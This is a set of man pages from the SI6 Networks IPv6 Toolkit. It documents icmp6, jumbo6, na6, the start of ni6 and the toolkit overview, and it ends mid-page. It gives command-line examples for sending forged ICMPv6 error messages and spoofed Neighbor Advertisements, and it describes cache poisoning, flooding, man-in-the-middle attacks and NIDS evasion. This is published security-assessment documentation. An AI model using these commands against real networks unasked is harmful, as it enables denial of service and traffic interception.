\-\-help Print help information for the .B icmp6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B icmp6 tool. \fBExample #1\fR # icmp6 \-i eth0 \-L \-p TCP \-v The tool employs the network interface "eth0", and operates in "Listening" mode ("\-L" option). Each ICMPv6 error message will contain the ICMPv6 Payload as many bytes from the captured packet without exceeding the minimum IPv6 MTU (1280 bytes). The tool will print detailed information about the attack ("\-v" option). \fBExample #2\fR # icmp6 \-\-icmp6\-packet\-too\-big \-p ICMP6 \-d 2001:db8:10::1 \-\-peer\-addr 2001:db8:11::2 \-m 1240 \-v The tool will send an ICMPv6 Packet Too Big error message that advertises an MTU of 1240 bytes. The ICMPv6 error message will be sent to the address " "2001:db8:10::1". The ICMPv6 error message will embed an ICMPv6 Echo Request message with the Source Address set to "2001:db8:10::1" (i.e., Destination Address of the error message), and the Destination Address set to "2001:db8:11::2) ("\-\-peer\-addr" option). The value of the "Identifier" and "Sequence Number" fields of the embedded ICMPv6 Echo Request message will be randomized. The tool will provide detailed information about the attack ("\-v" option). .SH SEE ALSO RFC 5927 (available at ) and "Security Assessment of the Transmission Control Protocol (TCP)" (available at ) for a discussion of ICMPv6 attacks against TCP. .SH AUTHOR The .B icmp6 tool and the corresponding manual pages were produced by Fernando Gont for SI6 Networks. .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/manuals/ipv6toolkit.7000066400000000000000000000112211254360455000204310ustar00rootroot00000000000000.TH IPV6TOOLKIT 7 .SH NAME ipv6toolkit \- An IPv6 security assessment and trouble\-shooting toolkit .SH DESCRIPTION The SI6 Networks' IPv6 Toolkit is a security assessment and trouble\-shooting toolkit for IPv6 networks and implementations. It provides a number of tools to send abitrary IPv6 packets, perform IPv6 address\-scans, analyze IPv6 addresses, etc. This version of the toolkit (v2.0) includes the following tools: * addr6 * blackhole6 * flow6 * frag6 * icmp6 * jumbo6 * na6 * ni6 * ns6 * path6 * ra6 * rd6 * rs6 * scan6 * script6 * tcp6 * udp6 .B addr6 is an IPv6 address analysis and manipulation tool. Given a list of IPv6 addresses, it can filter such list based on different criteria, such as IPv6 address type, IPv6 address scope, IPv6 prefix, etc. Additionally, given a list of IPv6 addresses .B addr6 can produce statistics on such addresses, including address scopes, types, and type of IPv6 interface identifier. .B addr6 can also analyze a single address, producing script\-friendly output, such that its analysis can be leveraged by other tools or scripts. .B blackhole6 is a troubleshooting tool which can find IPv6 where in the network topology packets with specific IPv6 Extension Headers are being dropped. .B flow6 allows the security assessment of the IPv6 Flow Label. Essentially, it can be leveraged to assess the Flow Label generation policy of a terget implementation. .B frag6 is a security assessment tool for the IPv6 fragmentation mechanism. It allows the exploitation of fragmentation\-based attacks, and can also be employed to assess the Fragment Identification generation policy, assess support for IPv6 atomic fragments, etc. .B icmp6 is a security assessment tool for the ICMPv6 protocol. It can easily produce arbitrary ICMPv6 error messages, and includes the capability to generate such messages in response to received traffic. .B icmp6 can also be used to send crafted ICMPv6 messages of arbitrary type/code combinations. .B jumbo6 is a secuity assessment tool for IPv6 Jumbograms. .B na6 is a security assessment tool for attack vectors based on Neighbor Advertisement messages (including Neighbor Cache poisoning attacks, DAD attacks, etc.). .B ni6 is a security assessment tool for attacks vectors and reconnaissance techniques based on ICMPv6 Node Information messages. .B ns6 is a security assessment tool for attack vectors based on Neighbor Solicitation messages (including Neighbor Cache poisoning attacks, Neighbor Cahe exhaustion attacks, etc.). .B path6 is a versatile IPv6-based traceroute tool (which supports extension headers, IPv6 fragmentation, and other features not present in existing traceroute implementations). .B ra6 is a security assessment tool for attack vectors based on Router Advertisement messages (including various types of fooding attacks, man-in-the-middle attacks, and Denial of Service attacks, etc.). .B rd6 is a security assessment tool for attack vectors based on ICMPv6 Redirect messages. It can easily produce arbitrary ICMPv6 Redirect messages, and also includes the capability to generate such messages in response to received traffic. .B rs6 is a security assessment tool for attack vectors based on Router Solicitation messages. .B scan6 is a full\-fledged IPv6 address scanning tool, which can leverage specific IPv6 address patterns to greatly reduce the search space for "alive" nodes. .B script6 is set of scripts/commands that make rather complex and frequent tasks easy. .B tcp6 is a security assessment tool for attack vectors based on TCP/IPv6 packets. It can be easily employed to launch classic TCP\-based attacks such as SYN-floods, but can also be employed to launch other more complex attacks such as TCP connection floods, etc. .B udp6 is a tool for sending arbitrary IPv6-based UDP datagrams. .SH SEE ALSO .BR ipv6toolkit.conf (5), .BR addr6 (1), .BR blackhole6 (1), .BR flow6 (1), .BR frag6 (1), .BR icmp6 (1), .BR jumbo6 (1), .BR na6 (1), .BR ni6 (1), .BR ns6 (1), .BR path6 (1), .BR ra6 (1), .BR rd6 (1), .BR rs6 (1), .BR scan6 (1), .BR script6 (1), .BR tcp6 (1), .BR udp6 (1) .SH AUTHOR The SI6 Networks' IPv6 Toolkit and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2015 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/manuals/ipv6toolkit.conf.5000066400000000000000000000035641254360455000213660ustar00rootroot00000000000000.TH IPV6TOOLKIT.CONF 5 .SH NAME ipv6toolkit.conf \- Configuration file for the SI6 Networks' IPv6 address monitoring daemon (ipv6mon) .SH SYNOPSIS .B /etc/ipv6toolkit.conf .SH DESCRIPTION This file controls the operation of the .B SI6 Networks' IPv6 Toolkit \[char46] It allows the system administrator to configure parameters such as: .TS tab (@); l l. @\+ Location of the IEEE OUI database .TE The configuration file follows the following general format: .sp .RS 4 .nf # Comments Variable1=Value1 # Comments Variable2=Value2 .fi .RE The following configuration options are currently supported: .TP \fBOUI-Database\fR This variable specifies the location of the IEEE OUI database. If left unspecified, the IEEE OUI databased is expected to be found "/usr/share/oui.txt". This is a stripped down version of the IEEE OUI list available at . The tool is able to process the raw file available from the IEEE site (hence the included oui.txt file can be overwritten with a freshly downloaded copy without any additional processing). .SH EXAMPLES The following is a sample .IR ipv6toolkit.conf file. .sp .nf # SI6 Networks IPv6 Toolkit Configuration File OUI-Database=/usr/share/ipv6toolkit/oui.txt .fi .RE .SH SEE ALSO .BR ipv6toolkit (7) .SH AUTHOR The .B SI6 Networks' IPv6 Toolkit and the corresponding manual pages were produced by Fernando Gont for SI6 Networks . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/manuals/jumbo6.1000066400000000000000000000153441254360455000173450ustar00rootroot00000000000000.TH JUMBO6 1 .SH NAME jumbo6 \- A security assessment tool for attack vectors based on IPv6 jumbograms .SH SYNOPSIS .B jumbo6 .RB [\| \-i .IR INTERFACE\| ] [\-S LINK_SRC_ADDR] [\-D LINK-DST-ADDR] [\-s SRC_ADDR[/LEN]] [\-d DST_ADDR] [\-A HOP_LIMIT] [\-H HBH_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-q IPV6_LENGTH] [\-Q JUMBO_LENGTH] [\-P PAYLOAD_SIZE] [\-l] [\-z SECONDS] [\-v] [\-h] .SH DESCRIPTION .B jumbo6 allows the assessment of IPv6 implementations with respect to attack vectors based on IPv6 jumbograms. It is part of the SI6 Networks' IPv6 Toolkit : a security assessment suite for the IPv6 protocols. This tool has only one mode of operation: active mode. In active mode, the tool sends IPv6 jumbograms to the specified target, and informs the user of any received ICMPv6 error messages (typically "ICMPv6 Parameter Problem" error messages). .SH OPTIONS .B jumbo6 takes its parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). jumbo6 supports IPv6 Extension Headers, including the IPv6 Fragmentation Header, which might be of use to circumvent layer\-2 filtering and/or Network Intrusion Detection Systems (NIDS). However, IPv6 extension headers are not employed by default, and must be explicitly enabled with the corresponding options. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link\-local address, the interface must be explicitly specified. The interface may also be specified along with a destination address, with the "\-d" option. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the probe packets. If left unspecified, the link\-layer Source Address of the packets is set to the real link\-layer address of the network interface. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link\-layer Destination Address of the probe packets (currently, only Ethernet is supported). By default, the link\-layer Destination Address is automatically set to the link\-layer address of the destination host (for on-link destinations) or to the link\-layer address of the first-hop router. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 source address (or IPv6 prefix) to be used for the Source Address of the outgoing packets. If an IPv6 prefix is specified, the IPv6 Source Address of the outgoing packets will be randomized from that prefix. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the target node. This option cannot be left unspecified. .TP \-\-hop\-limit, \-A This option specifies the Hop Limit to be used for the IPv6 packets. By default, the Hop Limit is randomized. .TP .BI \-y\ SIZE ,\ \-\-frag\-hdr\ SIZE This option specifies that the resulting packet must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the resulting packet. The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. This option is only valid if the "\-y" option is specified (as the concept of "unfragmentable part" only makes sense when fragmentation is employed). .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop\-by\-Hop Options headers may be specified by means of multiple "\-H" options. .TP \-\-ipv6\-length, \-q This option specifies the value that the "Total Length" field of the IPv6 header should be set to. If this option is left unspecified, the "Total Length" field is set to 0, as required by the IPv6 jumbograms specification. .TP \-\-jumbo\-length, \-Q This option specifies the value to which the "Jumbo Payload Length" field of the Jumbo Payload option should be set. If this option is left unspecified, the "Jumbo Payload Length" field is set according to the real size of the jumbo payload (see the "\-p" option). .TP \-\-payload\-size, \-P This options specifies the size of the jumbo payload. If left unspecified, the payload size is set to 0. .TP \-\-loop, \-l This option instructs the jumbo6 tool to send periodic IPv6 jumbograms to the victim node. The amount of time to pause between sending IPv6 jumbograms can be specified by means of the "\-z" option, and defaults to 1 second. .TP \-\-sleep, \-z This option specifies the amount of time to pause between sending IPv6 jumbograms (when the "\-\-loop" option is set). If left unspecified, it defaults to 1 second. .TP \-\-verbose, \-v This option instructs the jumbo6 tool to be verbose. When the option is set twice, the tool is "very verbose", and the tool also informs which packets have been accepted or discarded as a result of applying the specified filters. .TP \-\-help, \-h Print help information for the jumbo6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B jumbo6 tool. \fBExample #1\fR # jumbo6 \-s fc00:1::/64 \-d fc00:1::1 \-P 100 Send an IPv6 jumbogram to the host fc00:1::1. The IPv6 Source Address will be randomly selected from the prefix fc00:1::/64, and a the payload of 100 bytes is included in the packet. .SH AUTHOR The .B jumbo6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/manuals/na6.1000066400000000000000000000456561254360455000166400ustar00rootroot00000000000000.TH NA6 1 .SH NAME na6 \- A security assessment tool for attack vectors based on ICMPv6 Neighbor Advertisement messages .SH SYNOPSIS .B na6 .RB [\| \-i .IR INTERFACE\| ] [\-s SRC_ADDR[/LEN]] [\-d DST_ADDR] [\-S LINK_SRC_ADDR] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-D LINK-DST-ADDR] [\-t TARGET_ADDR[/LEN]] [\-r] [\-c] [\-o] [\-E LINK_ADDR] [\-e] [\-j PREFIX[/LEN]] [\-k PREFIX[/LEN]] [\-J LINK_ADDR] [\-K LINK_ADDR] [\-w PREFIX[/LEN]] [\-b PREFIX[/LEN]] [\-g PREFIX[/LEN]] [\-B LINK_ADDR] [\-G LINK_ADDR] [\-W PREFIX[/LEN]] [\-F N_SOURCES] [\-T N_TARGETS] [\-L | \-l] [\-z] [\-v] [\-V] [\-h] .SH DESCRIPTION .B na6 allows the assessment of IPv6 implementations with respect to a variety of attack vectors based on ICMPv6 Neighbor Advertisement messages. It is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 Protocols. This tool has two modes of operation: active and passive. In active mode, the tool attacks a specific target, while in passive mode the tool listens to traffic on the local network, and launches an attack in response to such traffic. Active mode is employed if a destination address (IPv6 Destination Address or Ethernet Destination Address) and a Target Address are specified. Passive mode is employed if the "\-L" option (or its long counterpart "\-\-listen") is set. If both an attack target and the "\-L" option are set, the attack is launched against the specified target, and then the tool enters passive mode to respond incoming Neighbor Solicitation messages with Neighbor Advertisement (attack) packets. The tool supports filtering of incoming Neighbor Solicitation messages based on the Ethernet Source Address, the Ethernet Destination Address, the IPv6 Source Address, the IPv6 Destination Address, and the Neighbor Solicitation Target Address. There are two types of filters: "block filters" and "accept filters". If any "block filter" is specified, and the incoming Neighbor Solicitation message matches any of those filters, the message is discarded (and thus no Neighbor Advertisements are sent in response). If any "accept filter" is specified, incoming Neighbor Solicitation messages must match the specified filters in order for the na6 tool to respond with Neighbor Advertisement messages. .SH OPTIONS .B na6 takes its parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). Depending on the amount of information (i.e., options) to be conveyed into the Neighbor Advertisements, it may be necessary for the na6 tool to split that information into more than one Neighbor Advertisement message. Also, if the tool is instructed to flood the victim with Neighbor Advertisements from different sources ("\-\-flood\-sources" option), multiple packets may need to be generated. na6 supports IPv6 fragmentation, which may be of use if a large amount of information needs to be conveyed within a single Neighbor Advertisement message. However, IPv6 fragmentation is not enabled by default, and must be explicitly enabled with the "\-y" option. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link-local address, or the "listening" ("\-L") mode is selected, the interface must be explicitly specified. The interface may also be specified along with a destination address, with the "\-d" option. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 source address (or IPv6 prefix) to be used for the Source Address of the attack packets. If left unspecified, a random link-local unicast address (fe80::/64) is selected. If the "\-T" ("\-\-flood\-targets") option is specified, this option includes an IPv6 prefix. See the description of the "\-T" option for further information on how the "\-s" option is processed in that specific case. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the victim. If left unspecified, but the Ethernet Destination Address is specified, the "all-nodes link-local multicast" address (ff02::1) is selected as the IPv6 Destination Address. When operating in passive mode ("\-L" option), the IPv6 Destination Address is selected according to the IPv6 Source Address of the incoming Neighbor Solicitation message. If the IPv6 Source Address of the Neighbor Solicitation is the unspecified address (::), the "all-nodes link-local multicast" address (ff02::1) is used as the IPv6 Destination Address. Otherwise, the IPv6 Source Address of the incoming Neighbor Solicitation message is used as the IPv6 Destination Address of the outgoing Neighbor Advertisement (attack) messages. .TP \-\-hop\-limit, \-A This option specifies the Hop Limit to be used for the Neighbor Advertisement messages. It defaults to 255. Note that IPv6 nodes are required to check that the Hop Limit of incoming Neighbor Advertisement messages is 255. Therefore, this option is only useful to assess whether an IPv6 implementation fails to enforce the aforementioned check. .TP .BI \-y\ SIZE ,\ \-\-frag\-hdr\ SIZE This option specifies that the resulting packet must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the resulting packet. The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. This option is only valid if the "\-y" option is specified (as the concept of "unfragmentable part" only makes sense when fragmentation is employed). .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop\-by\-Hop Options headers may be specified by means of multiple "\-H" options. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the Neighbor Advertisement messages (this option is only valid for Ethernet interfaces). If left unspecified, the link\-layer Source Address is randomized. When operating in passive mode, the link\-layer Source Address is selected according to the IPv6 Destination Address of the incoming Neighbor Solicitation message. If the IPv6 Destination Address of the incoming Neighbor Solicitation message is a multicast address (usually a solicited-node multicast address), the link\-layer Source Address is set to the address specified by the "\-S" option (or to a random address if the "\-S" option was left unspecified). If the IPv6 Destination Address of the incoming Neighbor Solicitation is not a multicast address (i.e., it is a unicast address), the link\-layer Source Address is set to the Ethernet Destination Address of the incoming Neighbor Solicitation message. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link\-layer Destination Address of the Neighbor Advertisement messages (this option is only valid for Ethernet interfaces). If left unspecified, it is set to the "all-nodes link-local multicast" address (ff02::1). When operating in passive mode, the link\-layer Destination Address is set according to the IPv6 Source Address of the incoming Neighbor Solicitation message. If the IPv6 Source Address of the incoming Neighbor Solicitation message is the unspecified address (::), the link\-layer destination address is set to "33:33:00:00:00:01" (the Ethernet multicast address corresponding to the IPv6 "all-nodes link-local multicast" address). Otherwise, the link\-layer Destination Address is set to the link\-layer Source Address of the incoming Neighbor Solicitation message. .TP \-\-router, \-r This option instructs the na6 tool to set the "R" (Router) bit in the Neighbor Advertisement messages that it sends. The "R" bit indicates that the node sending the message is a router. If left unspecified, the "R" bit is not set. .TP \-\-solicited, \-c This option instructs the na6 tool to set the "S" ("Solicited") bit in the Neighbor Advertisement messages that it sends. When operating in passive mode ("\-L" option), the "Solicited" flag is forced to 1 in all responses sent to unicast IPv6 addresses. .TP \-\-override, \-o This option instructs the na6 tool to set the ‘O’ ("Override") bit in the Neighbor Advertisement messages that it sends. If this option is left unspecified, the ‘O’ bit is not set. .TP \-\-target, \-t This option specifies the IPv6 Target Address of the Neighbor Advertisement messages. If the "\-T" ("\-\-flood\-targets") option is specified, this option specifies an IPv6 prefix in the form "\-t prefix/prefixlen". See the description of the "\-T" option for further information on how the "\-t" option is processed in that specific case. .TP \-\-target\-lla\-opt, \-E This option specifies the contents of a target link\-layer address option to be included in the Neighbor Advertisement messages. If a single option is specified, it is included in all the outgoing Neighbor Advertisement messages. If more than one target link\-layer address is specified (by means of multiple "\-E" options), and all the resulting options cannot be conveyed into a single Neighbor Advertisement message, multiple Neighbor Advertisements will be sent as needed. .TP \-\-add\-tlla\-opt, \-e This option instructs the na6 tool to include a target link\-layer address option in the Neighbor Advertisement messages that it sends. The target link\-layer address included in the option is the same as the Ethernet Source Address used for the outgoing Neighbor Advertisement messages. The difference between this option and the "\-E" option is that the "\-e" option does not specify the actual value of the option, but just instructs the tool to include a target link\-layer address option (the actual value of the option is selected as explained before). .TP .BI \-j\ SRC_ADDR ,\ \-\-block\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-j prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-k\ DST_ADDR ,\ \-\-block\-dst\ DST_ADDR This option sets a block filter for the incoming Neighbor Solicitation messages, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-k prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-J\ SRC_ADDR ,\ \-\-block\-link\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their link\-layer Source Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP .BI \-K\ DST_ADDR ,\ \-\-block\-link\-dst\ DST_ADDR This option sets a block filter for the incoming packets, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP .BI \-b\ SRC_ADDR ,\ \-\-accept\-src\ SRC_ADDR This option sets an accept filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-b prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-g\ DST_ADDR ,\ \-\-accept\-dst\ DST_ADDR This option sets a accept filter for the incoming packets, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-g prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-B\ SRC_ADDR ,\ \-\-accept\-link\-src\ SRC_ADDR This option sets an accept filter for the incoming Neighbor Solicitation messages, based on their link\-layer Source Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP .BI \-G\ DST_ADDR ,\ \-\-accept\-link\-dst\ DST_ADDR This option sets an accept filter for the incoming packets, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP \-\-block\-target, \-w This option sets a block filter for the incoming Neighbor Solicitation messages, based on their Target Address. It allows the specification of an IPv6 prefix in the form "\-w prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP \-\-accept\-target, \-W This option sets a accept filter for the incoming Neighbor Solicitation messages, based on their Target Address. It allows the specification of an IPv6 prefix in the form "\-W prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP \-\-flood\-targets, \-T This option instructs the na6 tool to send Neighbor Advertisements for multiple Target Addresses. The number of different Target Addresses is specified as "\-T number". The Target Address of each packet is randomly selected from the prefix fe80::/64, unless a different prefix has been specified by means of the "\-t" option. The IPv6 Source Address of each Neighbor Advertisement message is set according to the IPv6 address or prefix specified with the "\-s" option, and defaults to a random link-local unicast address (fe80::/64) if the "\-s" option is left unspecified. .TP \-\-flood\-sources, \-F This option instructs the tool to send multiple Neighbor Advertisement messages with different Source Addresses. The number of different sources is specified as "\-F number". The Source Address of each Neighbor Advertisement is randomly selected from the prefix specified by the "\-s" option. If the "\-F" option is specified but the "\-s" option is left unspecified, the Source Address of the packets is randomly selected from the prefix fe80::/64 (link-local unicast). It should be noted that hosts are required to discard Router Advertisement messages that do not have a link-local unicast address as the Source Address. .TP \-\-loop, \-l This option instructs the na6 tool to send periodic Neighbor Advertisements to the victim node. The amount of time to pause between sending Neighbor Advertisements can be specified by means of the "\-z" option, and defaults to 1 second. Note that this option cannot be set in conjunction with the "\-L" ("\-\-listen") option. .TP \-\-sleep, \-z This option specifies the amount of time to pause between sending Neighbor Solicitations (when the "\-\-loop" option is set). If left unspecified, it defaults to 1 second. .TP \-\-listen, \-L This instructs the na6 tool to operate in passive mode (possibly after attacking a given node, if the ‘\-d’ or ‘\-D’ options were specified). Note that this option cannot be used in conjunction with the "\-l" ("\-\-loop") option. .TP \-\-verbose, \-v This option instructs the na6 tool to be verbose. When the option is set twice, the tool is "very verbose", and the tool also informs which packets have been accepted or discarded as a result of applying the specified filters. .TP \-\-help, \-h Print help information for the na6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B na6 tool. \fBExample #1\fR # na6 \-i eth0 \-d fe80::1 \-t 2001:db8::1 \-c \-o \-e Use the network interface "eth0" to send a Neighbor Advertisement using a random link-local unicast IPv6 Source Address and a random Ethernet Source Address, to the IPv6 Destination address ffe80::1 and the Ethernet Destination Address 33:33:00:00:00:01 (selected by default). The target of the Neighbor Advertisement is 2001:db8::1, and the message has both the "Override" and the "Solicited" flags set. The Neighbor Advertisement also includes a target link\-layer address option that contains the same Ethernet address as that used for the Ethernet Source Address of the packet. \fBExample #2\fR # na6 \-i eth0 \-j fe80::1 \-j 2001:db8::/32 \-W fe80::/64 \-c \-o \-e \-L \-v \-v Listen for incoming Neighbor Solicitation messages on the interface "eth0". Discard those messages that have an IPv6 Source Address equal to fe80::1, an IPv6 Source Address that belongs to the prefix 2001:db8::/32, or a Target Address that does not belong to the prefix fe80::/64. Respond (to those messages that are accepted) with a Neighbor Advertisement with a randomized Ethernet Source Address and a randomized link-local unicast IPv6 Source Address (unless the Destination Address of the Neighbor Solicitation was a unicast address), the IPv6 Destination Address set to the Source Address of the incoming NS message (unless it was the unspecified address), the Target Address set to the same value as the Target Address of the incoming NS, and the "Solicited" and "Override" flags set. Be very verbose ("\-v \-v" options). .SH SEE ALSO "Security/Robustness Assessment of IPv6 Neighbor Discovery Implementations" (available at: ) for a discussion of Neighbor Discovery vulnerabilities, and additional examples of how to use the na6 tool to exploit them. .SH AUTHOR The .B na6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/manuals/ni6.1000066400000000000000000000373711254360455000166430ustar00rootroot00000000000000.TH NI6 1 .SH NAME nI6 \- A security assessment tool for attack vectors based on ICMPv6 Node Information messages .SH SYNOPSIS .B ni6 .RB [\| \-i .IR INTERFACE\| ] [\-S LINK_SRC_ADDR | \-R] [\-D LINK_DST_ADDR] [\-s SRC_ADDR[/LEN] | \-r] [\-d DST_ADDR] [\-c HOP_LIMIT] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-P SIZE | \-6 IPV6_ADDR | \-4 IPV4_ADDR | \-n NAME | \-N LEN | \-x LEN \-o TYPE] [\-Z SIZE] [\-e] [\-C ICMP6_CODE] [\-q NI_QTYPE] [\-X NI_FLAGS] [\-P SIZE | \-w IPV6_ADDR | \-W IPV4_ADDR | \-a NAME | \-A LEN | \-Q LEN \-O TYPE] [\-E] [\-j PREFIX[/LEN]] [\-k PREFIX[/LEN]] [\-J LINK_ADDR] [\-K LINK_ADDR] [\-b PREFIX[/LEN]] [\-g PREFIX[/LEN]] [\-B LINK_ADDR] [\-G LINK_ADDR] [\-L | \-l] [\-z] [\-v] [\-h] .SH DESCRIPTION .B ni6 allows the assessment of IPv6 implementations with respect to a variety of attack vectors based on ICMPv6 Node Information messages. This tool is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 protocols. This tool has two modes of operation: "active" and "listening". In "active" mode, the tool attacks a specific target, while in "listening" mode the tool listens to ICMPv6 Node Information Query messages on the local network, and sends ICMPv6 Node Information Reply messages in response to such traffic. Active mode is employed if an IPv6 Destination Address is specified. Listening mode is employed if the "\-L" option (or its long counterpart "\-\-listen") is set. If both an attack target and the "\-L" option are specified, the attack is launched against the specified target, and then the tool enters listening mode to respond incoming packets with TCP segments. The tool supports filtering of incoming packets based on the Ethernet Source Address, the Ethernet Destination Address, the IPv6 Source Address, and the IPv6 Destination Address. There are two types of filters: "block filters" and "accept filters". If any "block filter" is specified, and the incoming packet matches any of those filters, the message is discarded (and thus no ICMPv6 NI Reply messages are sent in response). If any "accept filter" is specified, incoming packets must match any of the specified "accept filters" in order for the tool to respond with ICMPv6 NI Reply messages. .SH OPTIONS .B ni6 takes it parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). ni6 supports IPv6 Extension Headers, including the IPv6 Fragmentation Header, which might be of use to circumvent layer-2 filtering and/or Network Intrusion Detection Systems (NIDS). However, IPv6 extension headers are not employed by default, and must be explicitly enabled with the corresponding options. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the 